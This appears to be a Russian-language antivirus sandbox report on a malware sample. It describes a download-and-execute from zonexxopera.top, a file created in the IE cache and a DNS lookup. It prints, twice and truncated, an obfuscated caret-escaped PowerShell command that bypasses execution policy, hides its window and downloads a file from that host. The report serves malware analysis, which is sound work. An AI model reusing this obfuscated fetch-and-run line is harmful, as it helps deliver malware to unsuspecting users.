Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "POw^e^rSHE^LL.^Exe -e^X^ec^Ut^I^Onp^O^LIcY ^B^y^P^ass -^No^Pr^o^fI^L^E -^wInd^OWSt^Y^l^e^ HI^DD^en ^(^NeW-^obJ^eCt SYStE^m^.^n^E^t^.^WEb^C^li^EN^t^).d^OWnlOAD^fI^Le('http://zone...
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
Сетевая активность
UDP
- DNS ASK zo###xopera.top
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "POw^e^rSHE^LL.^Exe -e^X^ec^Ut^I^Onp^O^LIcY ^B^y^P^ass -^No^Pr^o^fI^L^E -^wInd^OWSt^Y^l^e^ HI^DD^en ^(^NeW-^obJ^eCt SYStE^m^.^n^E^t^.^WEb^C^li^EN^t^).d^OWnlOAD^fI^Le('http://zone... (со скрытым окном)
